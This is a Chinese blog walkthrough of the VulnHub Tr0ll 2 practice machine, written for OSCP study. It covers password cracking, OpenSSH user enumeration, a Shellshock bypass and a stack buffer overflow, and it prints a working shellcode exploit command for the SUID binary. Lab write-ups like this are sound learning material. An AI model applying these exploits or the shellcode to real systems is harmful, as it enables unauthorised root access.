OSCP练习:vulhub靶机TR0LL 2攻略

最新推荐文章于 2024-03-02 17:01:02 发布
最新推荐文章于 2024-03-02 17:01:02 发布
阅读量4.2k 收藏 5
点赞数 1
分类专栏: OSCP练习 vulnhub靶机通关 文章标签: 网络 网络安全 安全 web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/124342878
版权

信息收集

主机发现

先用namp做个扫描
在这里插入图片描述在这里插入图片描述

发现21ftp、22ssh、80http

网站信息收集

访问web页面,跟上一关一样没啥东西
在这里插入图片描述

爆一下网站目录
在这里插入图片描述

发现robots文件中告诉我们一些路径,将其保存当作dirb字典在进行爆破
在这里插入图片描述

在这里插入图片描述

果然又发现了几个路径,但是所有页面都是同一个图…以及一句话…
在这里插入图片描述

但是!当我们把图片下载下来,算一下MD5就会发现/dont_bother里的图片MD5跟其他的不一样!

在这里插入图片描述

看一眼图片二进制发现重要信息,y0ur_self会是突破电
strings cat_the_troll3.jpg
在这里插入图片描述

访问一下http://192.168.8.133/y0ur_self/,发现answer文档r在这里插入图片描述

发现answer时base64编码
在这里插入图片描述

base64解码,应该是个字典
在这里插入图片描述

当前能够登录的服务有ssh和ftp

漏洞利用

fcrackzip爆破压缩文件

登录ftp,发现提示我们使用Tr0ll登录,尝试密码也用Tr0ll,登录成功。登陆后发现lmao.zip文件,把他下载到kali本地
在这里插入图片描述

当解压压缩包时发先密码,推断前面字典应该时用到这的
在这里插入图片描述

使用fcrackzip爆破压缩包,发现密码为ItCantReallyBeThisEasyRightLOL
在这里插入图片描述

ssh私钥泄露+cve-2018-15473openssh用户枚举

解压压缩包,只有一个noob文件,发现noob文件为ssh私钥
在这里插入图片描述

有了私钥但是不知道ssh用户名是什么,靶机ssh服务为openssh5.9版本,浅差一下发现openssh用户枚举漏洞能用
exp下载地址
https://github.com/epi052/cve-2018-15473

带上字典跑一跑,返回boob用户存在
在这里插入图片描述

尝试ssh私钥登录,发现私钥是正确的,但是链接给断了
在这里插入图片描述

shellshock Bash cve-2014-6271漏洞

查阅了一下资料,发现shellshock bash漏洞可利用(Bash 支持将 shell 变量以及 shell 函数导出到其他 bash 实例)
资料链接
https://resources.infosecinstitute.com/topic/practical-shellshock-exploitation-part-2/#gref
https://www.csoonline.com/article/2687265/remote-exploit-in-bash-cve-2014-6271.html

在这里插入图片描述

提权

当前ssh登录的noob用户权限较低
这里我们找一下suid权限,发现/nothing_to_see_here/choose_wisely目录比较有意思,door1-3中各有一个r00t二进制文件

在这里插入图片描述

python调一下bash
python -c ‘import pty;pty.spawn(“/bin/bash”)’
在这里插入图片描述

通过scp把目录穿到kali中
注意需要调原生bash,不然伪终端scp会报错,也可在命令后加上 -t -t 解决
在这里插入图片描述

(没看懂,上网找资料…https://github.com/zionspike/vulnhub-writeup/blob/master/tr0ll-2/kapi-note.md
创建模式字符串来查找缓冲区大小。
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500
在这里插入图片描述

靶机上通过gdp调试
r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq
在这里插入图片描述

发现door1里的r00t不对,
door2的r00t出现可能出现缓冲区溢出的报错(不一定是door2中的r00t,貌似随机的)

esp 的位置是 0xbffffab0 但我不能将此偏移量用作外壳位置。 我必须稍微增加或减少偏移量,因为当二进制文件在调试时内存是不同的。
在这里插入图片描述

模式转换为十进制缓冲区大小
在这里插入图片描述

使用 msfvenom 创建 /bin/sh 的有效负载并转义空字节
在这里插入图片描述

写一个漏洞利用。 (A*268)(shell 偏移)(nop sled)(shellcode)
即使我发现 esp 的位置是 0xbffffab0 但我不能将此偏移量用作外壳位置。 我必须稍微增加或减少偏移量,因为当二进制文件在调试时内存是不同的。
直接上exp
./r00t $(python -c “print ‘A’ * 268 + ‘\x80\xfb\xff\xbf’ + ‘\x90’ *10 + ‘\xba\xa0\x7b\x18\x95\xdb\xcd\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x0b\x31\x50\x15\x83\xe8\xfc\x03\x50\x11\xe2\x55\x11\x13\xcd\x0c\xb4\x45\x85\x03\x5a\x03\xb2\x33\xb3\x60\x55\xc3\xa3\xa9\xc7\xaa\x5d\x3f\xe4\x7e\x4a\x37\xeb\x7e\x8a\x67\x89\x17\xe4\x58\x3e\x8f\xf8\xf1\x93\xc6\x18\x30\x93’”)

在这里插入图片描述

提取成功
在这里插入图片描述

Forest深林
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
oscp推荐的训练靶机raven2渗透过程
07-05
oscp推荐的训练靶机raven2渗透过程
Tr0ll2 vulnhub靶场(缓冲区溢出)
weixin_62621015的博客
03-12 716
Tr0ll2 vulnhub靶场(缓冲区溢出漏洞)
Troll2打靶思路详解(vulnhub
最新发布
MCcming的博客
03-02 1501
还是尝试用Hydra进行弱口令爆破并没有什么发现。
No.9-VulnHub-Tr0ll:2-Walkthrough渗透学习
qq_34801745的博客
01-06 1857
** VulnHub-Tr0ll:2-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/tr0ll-2,107/ 靶机难度:中级(CTF) 靶机发布日期:2014年10月24日 靶机描述:Tr0ll系列VM中的下一台计算机,这比原始的Tr0ll难度有所提高,但是解决所需的时间大致相同,并且毫无疑问,巨魔仍然存在! 难度是从初学者到中级。 目标:得到...
linux shellshock漏洞,shellshock漏洞分析
weixin_28706923的博客
05-18 292
这是tr0ll2靶机涉及到的东西,先看一下在这个靶机上的过程。我们获取了noob用户的ssh密钥,之后登录却失败了:之后我们输入如下命令:ssh [email protected] -i noob -t '() { :;}; /bin/bash'再次登录,居然成功了:以上就是shellshock攻击,其利用的是bash在导入环境变量函数时候的漏洞,启动bash的时候,它不仅会导入这个函数,也...
VulnHub-TR0LL: 2-靶机渗透学习
嗯嗯呐的博客
12-02 881
**靶机地址:https://www.vulnhub.com/entry/tr0ll-2,107/ 靶机难度:中级(CTF) 靶机描述:Tr0ll系列VM中的下一台计算机,这比原始的Tr0ll难度有所提高,但是解决所需的时间大致相同,并且毫无疑问,巨魔仍然存在! 难度是从初学者到中级。 目标:得到root权限目录信息收集fcrackzip爆破SSH用户枚举漏洞shellshock攻击缓冲区溢出提权总结 信息收集 nmap确定靶机地址 nmap扫描靶机端口 扫描出三个端口 21 FTP 22 ssh 80
渗透测试靶机---Tr0ll
weixin_60584088的博客
10-28 258
渗透测试,打靶经历记录,大佬多多指点,谢谢!
1-OSCP自学笔记-October靶机练习1
08-04
0、前言本教程为《OSCP自学笔记-靶机练习》系列之一的《October靶机练习》,在这个系列中笔者将抽取10台典型靶机作为练习目标,以OSCP学习及考试的角度
OSCP2020:个人使用的工具和脚本
05-30
OSCP2020 个人使用的工具和脚本
OSCP-PWK:https
04-27
OSCP 提供了更好的阅读体验,因为回购协议大多类似于草稿和备份。 注释和备忘单位于Wiki页面中。 回购中充斥着TryHackMe编写的内容和二进制文件。 卡利配置 ohmyzsh + powerlevel10K + tmux Kali 2020.3的提示:...
OSCP:OSCP考试材料
05-01
OSCP Linkedin: : 电子邮件:
9-vulnhub-Tr0ll2
尼德霍格007
07-27 318
VulnHub-Tr0ll2 靶机地址:https://www.vulnhub.com/entry/tr0ll-2,107/ 目标:得到root权限&找到proof.txt 作者:尼德霍格007 时间:2021-7-27 一、信息收集 打开kali虚拟机和目标机,两台虚拟机网络都处于NAT模式 kali查看本机IP段,我的是192.168.21.0/24 nmap扫一下本网段 nmap -sP 192.168.21.0/24 目标机IP地址是192.168.21.145 扫描开放端口 nmap
Linux unzip命令
dency
05-27 374
Linux unzip命令用于解压缩zip文件 unzip为.zip压缩文件的解压缩程序。 语法 unzip [-cflptuvz][-agCjLMnoqsVX][-P <密码>][.zip文件][文件][-d <目录>][-x <文件>] 或 unzip [-Z] 参数: -c 将解压缩的结果显示到屏幕上,并对字符做适当的转换。 -f 更新现有的文件。 -l 显示压缩文件内所包含的文件。 -p 与-c参数类似...
VulnHub靶场系列-Tr0ll2
rlenew的博客
05-28 640
主机:192.168.136.133 靶机:192.168.136.158 先用nmap扫描网段发现目标主机以及其开放的端口和服务 登陆主页 按照惯例查看一下源代码 发现一个有用的信息Author:Tr0ll,试一下利用这个能不能登上ftp 下载这个压缩包但是提示需要密码解压 然后再深层次扫描一下看看有没有其他漏掉的信息 登上robots.txt看看有没有其他有用的 发现有超级多个文件,经过一次次查看,发现在don’t_bother有一张图片 在源代码查看发现存在隐藏文件,下载图片 用ca
vulnhub-Tr0ll: 2 (考点:脑洞/猜猜猜/linux缓冲区溢出)
冬萍子癸水
04-23 410
https://www.vulnhub.com/entry/tr0ll-2,107/ nat模式, arp-scan -l 比平常多出来的ip就是靶机靶机跟上一个同名作品1一样继续考脑洞,猜猜猜,后面的缓冲区溢出,更是3个door不停的变换加断掉ssh加禁止ls等,够无聊的。。。。 这个缓冲区溢出,也挺诡异,我搜了这台靶机中国人写的外国人写的很多文章。esp地址和shellcode有的人这个可...
Vulnhub系列-Tr0ll-2
Yasso的博客
12-24 627
靶机:192.168.249.136 kali: 192.168.249.132 一、信息收集 nmap -sV -sS -A 192.168.249.136 –查看开放端口及服务 –ftp 21端口发现需要用户名和密码— 猜测用户名可能是Tr0ll 试了试密码也是这个 有个zip但要密码 dirb http://192.168.249.136/–对80端口http服务深入探测– –robots(.txt)可以正常访问– –应该是目录,作为字典扫一下— dirb http://192.168.2
vulnhub Tr0ll: 2
箭雨镜屋
12-30 2301
本文思路: nmap扫描---->dirb扫描发现robots---->dirb配合找到的字典爆破目录---->访问目录下载图片---->strings考察图片,发现新目录y0ur_self---->访问y0ur_self目录,获得字典answer.txt---->弱口令登录ftp---->用fcrackzip爆破lmao.zip密码---->通过密钥ssh登录,得到noob用户的shell---->linpeas.sh探测提权途径---->利用缓冲区溢出漏洞提权
2、vulnhub-tr0ll-2
qq_42660246的博客
09-18 83
成功登录ssh三种方式,详见链接:https://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh。前面找到偏移量之后,可以知道栈空间大小占据空间位置,接下来要找到跳板地址也就是ESP,就可以跳到恶意代码shellcode的位置。类型压缩文件密码的工具,工具小巧方便、破解速度快,能使用字典和指定字符集破解,适用于。发现下载下来的4个图片中,2.jpg 明显不同,使用16进行编辑器查看。
oscp relia
12-21
OSCP(Offensive Security Certified Professional)是一种信息安全认证,它着重于渗透测试和攻击技术。OSCP认证考试涵盖了网络渗透测试、漏洞利用、社会工程学和渗透测试工具的使用等内容。持有OSCP认证的专业人员...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值